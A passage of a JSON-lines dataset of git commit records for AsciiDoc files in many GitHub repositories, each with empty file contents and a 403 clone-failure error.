(#31652)\n\n","repos":"scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/reference\/aggregations\/metrics\/percentile-rank-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/metrics\/percentile-rank-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d88467efb73e224061ada816dd8b2ec73a417a38","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09dbdfe538e8a022adbb2787d821b884565517af","subject":"Update 2018-08-29-Comment-amener-une-ESN-vers-la-contribution-open-source.adoc","message":"Update 2018-08-29-Comment-amener-une-ESN-vers-la-contribution-open-source.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2018-08-29-Comment-amener-une-ESN-vers-la-contribution-open-source.adoc","new_file":"_posts\/2018-08-29-Comment-amener-une-ESN-vers-la-contribution-open-source.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5391386f63b044ced7dc4feb23bbec26ec650f0f","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 
2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b9edfb341d3d98a66a665909277eda1801e9094","subject":"Adding release notes for release of revapi_parent revapi_build_support revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin","message":"Adding release notes for release of revapi_parent revapi_build_support revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210429-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210429-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5469875c192474fe9c9416d2d34ee536d5f5824","subject":"y2b create post XBOX 360, PS3, Black Ops 2, Halo 4 Giveaway - 4 Prizes!","message":"y2b create post XBOX 360, PS3, Black Ops 2, Halo 4 Giveaway - 4 Prizes!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-21-XBOX-360-PS3-Black-Ops-2-Halo-4-Giveaway--4-Prizes.adoc","new_file":"_posts\/2012-12-21-XBOX-360-PS3-Black-Ops-2-Halo-4-Giveaway--4-Prizes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"459d690cf937fea1008eaba44eb688025b27423d","subject":"Updated doc - added processor configuration","message":"Updated doc - added processor configuration","repos":"peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,rashidaligee\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,Teradata\/kylo,Teradata\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,Teradata\/kylo","old_file":"docs\/latest\/security\/authorization\/ranger\/EnableRangerAuthorization.adoc","new_file":"docs\/latest\/security\/authorization\/ranger\/EnableRangerAuthorization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/claudiu-stanciu\/kylo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"5e8b83d53dcf44634cebe9334363c70189987463","subject":"y2b create post iPhone 5c Drop Test (Shot Using 120fps Slo-Mo on iPhone 5s)","message":"y2b create post iPhone 5c Drop Test (Shot Using 120fps Slo-Mo on iPhone 5s)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-21-iPhone-5c-Drop-Test-Shot-Using-120fps-SloMo-on-iPhone-5s.adoc","new_file":"_posts\/2013-09-21-iPhone-5c-Drop-Test-Shot-Using-120fps-SloMo-on-iPhone-5s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b41001c8534c6d9aad2bccb4b8204ada3ca1a54e","subject":"Update 2015-07-20-A-world-where-1ms-is-worth-100-millions-euros.adoc","message":"Update 2015-07-20-A-world-where-1ms-is-worth-100-millions-euros.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-07-20-A-world-where-1ms-is-worth-100-millions-euros.adoc","new_file":"_posts\/2015-07-20-A-world-where-1ms-is-worth-100-millions-euros.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9125a871ea295bd61986ee6c01a3a2cf36ec8e8e","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"049ca8cd9f39b621c8b2c734f0c1a16abd41e1be","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6edd4dfbcfdc433496171bf2afac0d94735dd864","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d5349ce2d07a5fa91bbaec8a23377ffbb4275ce","subject":"y2b create post Lacie 2big Quadra Unboxing \\u0026 Overview in HD!","message":"y2b create post Lacie 2big Quadra Unboxing \\u0026 Overview in HD!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-21-Lacie-2big-Quadra-Unboxing-u0026-Overview-in-HD.adoc","new_file":"_posts\/2011-01-21-Lacie-2big-Quadra-Unboxing-u0026-Overview-in-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19de00d798c1c52e291f6ff99dfa072d830d6cdb","subject":"Add initial architecture documentation","message":"Add initial architecture documentation\n","repos":"tnozicka\/openshift-acme,tnozicka\/openshift-acme","old_file":"docs\/design\/architecture.adoc","new_file":"docs\/design\/architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tnozicka\/openshift-acme.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ea1aa409e19869f4f37a451dd5585f072ac7c6c","subject":"Update 2011-09-30-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-1.adoc","message":"Update 2011-09-30-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-1.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-09-30-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-1.adoc","new_file":"_posts\/2011-09-30-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5616f326b214bc728964740f8be7f7a9ed819dc","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c91a6a0f2fb084f72ff7da144d6777dc19ba0c69","subject":"Update 2016-11-10-184600-Thursday-Workday.adoc","message":"Update 2016-11-10-184600-Thursday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-10-184600-Thursday-Workday.adoc","new_file":"_posts\/2016-11-10-184600-Thursday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbab69e9f0d3d0560f858788cd8082dd5326b32c","subject":"Update 
2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68f256d74a0293c18e1c12ac825f312f36faa0e7","subject":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ddbaf341bc008569ce3598bfd3a476c9d20d668","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a581e1e5c3b64536f266811827ae8f0096b3dea3","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc3530365f2b8fe9f47d0014925e2b3642ce26cd","subject":"Update 2016-10-29.adoc","message":"Update 2016-10-29.adoc","repos":"livehua\/livehua.github.io,livehua\/livehua.github.io,livehua\/livehua.github.io,livehua\/livehua.github.io","old_file":"_posts\/2016-10-29.adoc","new_file":"_posts\/2016-10-29.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/livehua\/livehua.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f8387276073cd4d2c04426056bec5119b815805","subject":"Update 
2015-04-03-Presentation-Data-Mobility-chez-Sup-Info-Paris.adoc","message":"Update 2015-04-03-Presentation-Data-Mobility-chez-Sup-Info-Paris.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-04-03-Presentation-Data-Mobility-chez-Sup-Info-Paris.adoc","new_file":"_posts\/2015-04-03-Presentation-Data-Mobility-chez-Sup-Info-Paris.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"416f0d17ea840c3a10cc61dbc28bcda2354984bd","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02906b6e47d67aaae6ec4fc3c25f65a320ba6b26","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed1b0d1c6c0683419c7261a1f50a035a7f971b6","subject":"Add README file","message":"Add README file\n","repos":"kprovost\/qinotify","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kprovost\/qinotify.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d999dd2b88c0cb32e43ce21c6d93ca5a9ae51014","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b1317b18589c45c63c4a1cf84ac74fe14213c81","subject":"Update 2015-06-18-Weeeeeeee.adoc","message":"Update 2015-06-18-Weeeeeeee.adoc","repos":"Arttii\/arttii.github.io,Arttii\/arttii.github.io,Arttii\/arttii.github.io","old_file":"_posts\/2015-06-18-Weeeeeeee.adoc","new_file":"_posts\/2015-06-18-Weeeeeeee.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Arttii\/arttii.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3009d513d01a3ddae71293b5661951a4fa1ca31","subject":"Create _using-rest-api.adoc","message":"Create _using-rest-api.adoc","repos":"camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/_using-rest-api.adoc","new_file":"docs\/src\/main\/asciidoc\/_using-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"edc196a943fe366f70087233c1c18019de3ba50a","subject":"Moved from the verbose DocBook format, to AsciiDoc format. Also updated the documentation to remove SSL setup for Tomcat, since that task in no longer required.","message":"Moved from the verbose DocBook format, to AsciiDoc format. Also updated the documentation to remove SSL setup for Tomcat, since that task in no longer required.\n\n","repos":"jsons\/eureka,candyam5522\/eureka,candyam5522\/eureka,candyam5522\/eureka","old_file":"docs\/eureka_install_guide.adoc","new_file":"docs\/eureka_install_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsons\/eureka.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db896941c7643c42c7bdde314cf10528b48fe997","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00fe77e54fbace22e0985a27dffd6539f36dd04c","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-weather\/README.adoc","new_file":"plugins\/boteco-plugin-weather\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b46ede17fce488ff8d3b43ab10291c4cd3a8bda","subject":"KUDU-811: gflag style guide","message":"KUDU-811: gflag style guide\n\nThis will be used for future gflags as well as for a massive overhaul of\nexisting ones.\n\nChange-Id: I5b18bd3bbb223a64272ba37ef77b3f25f512fa65\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7380\nTested-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Todd Lipcon 
<2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5a054bd156acf2c9678acd3d42bf41445fb22a9","subject":"add reference doc","message":"add reference doc\n","repos":"markllama\/lisa17,markllama\/lisa17","old_file":"REFERENCES.adoc","new_file":"REFERENCES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/lisa17.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29c895be546d12f9327a1342ca858ab9da785bbc","subject":"Documentacion","message":"Documentacion\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/best_practices\/best_practices.asciidoc","new_file":"fermat-documentation\/fermat_dap\/best_practices\/best_practices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a6206e45da4b0d3f988823ad147be0966d3b646","subject":"Add PBR article part two","message":"Add PBR article part two","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part2.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"8f0210729e9ab58f1287388a353c8176da330f72","subject":"docs(presenation): add license documentation","message":"docs(presenation): add license documentation\n","repos":"bentolor\/microframeworks-showcase,bentolor\/microframeworks-showcase,bentolor\/microframeworks-showcase","old_file":"docs\/img\/LICENSES.adoc","new_file":"docs\/img\/LICENSES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bentolor\/microframeworks-showcase.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d26a72fe3a1c98be2a43e2d4afc2002df7e7ad2","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 
2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acf695e190c29d6fbe8e33009bb30e45be496e9f","subject":"Update 2018-01-09-Flutter-Report-January-2018.adoc","message":"Update 2018-01-09-Flutter-Report-January-2018.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-09-Flutter-Report-January-2018.adoc","new_file":"_posts\/2018-01-09-Flutter-Report-January-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f7a07a61368609e5a46107bbe597566cdb7f42c","subject":"y2b create post PS3 Slim Unboxing - PRICE DROP!","message":"y2b create post PS3 Slim Unboxing - PRICE 